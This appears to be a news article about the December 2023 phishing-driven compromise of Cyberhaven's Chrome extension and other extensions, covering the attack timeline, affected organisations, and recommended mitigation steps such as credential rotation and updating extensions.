A sophisticated supply chain attack targeting multiple Chrome browser extensions has been discovered in late December 2023, with cybersecurity researchers revealing a significant compromise of several popular extensions, including Cyberhaven’s Data Loss Prevention (DLP) solution. This incident highlights the growing vulnerability of browser-based security tools to advanced persistent threats.
Understanding the Cyberhaven Extension Compromise
The attack began on December 24th when threat actors successfully executed a sophisticated phishing campaign targeting a Cyberhaven employee. After gaining access to the developer’s credentials, the attackers deployed a malicious version (24.10.4) of the company’s Chrome extension. The compromised code was designed to intercept authentication sessions and cookies, redirecting sensitive data to an attacker-controlled domain (cyberhavenext[.]pro).
Impact Assessment and Enterprise Exposure
The security breach potentially affected numerous high-profile organizations, including Snowflake, Motorola, Canon, and Reddit, all of which utilize Cyberhaven’s security solutions. The malicious extension remained active for approximately 30 hours before detection and removal from the Chrome Web Store, creating a significant window of exposure for corporate systems and sensitive data.
Broader Attack Surface and Additional Compromises
Security researchers at Nudge Security have identified at least four other Chrome extensions targeted in this campaign. Analysis of the attack infrastructure suggests the possibility of additional compromised extensions, with investigations currently ongoing. This pattern indicates a coordinated effort to exploit the trust placed in legitimate browser security tools.
Security Mitigation Steps
Cybersecurity experts recommend implementing the following protective measures:
- Immediately update all affected extensions to versions released after December 26th
- Conduct a comprehensive password reset across all critical accounts
- Rotate all API tokens and access credentials
- Clear browser data and reset browser configurations
- Review system logs for indicators of compromise
The incident is currently under investigation by Mandiant (Google) and federal law enforcement agencies, underscoring the severity of the breach. This attack serves as a critical reminder of the importance of implementing robust security measures, including multi-factor authentication for developer accounts and regular security audits of browser extensions. Organizations must remain vigilant and maintain comprehensive security protocols to protect against increasingly sophisticated supply chain attacks targeting browser-based security tools.
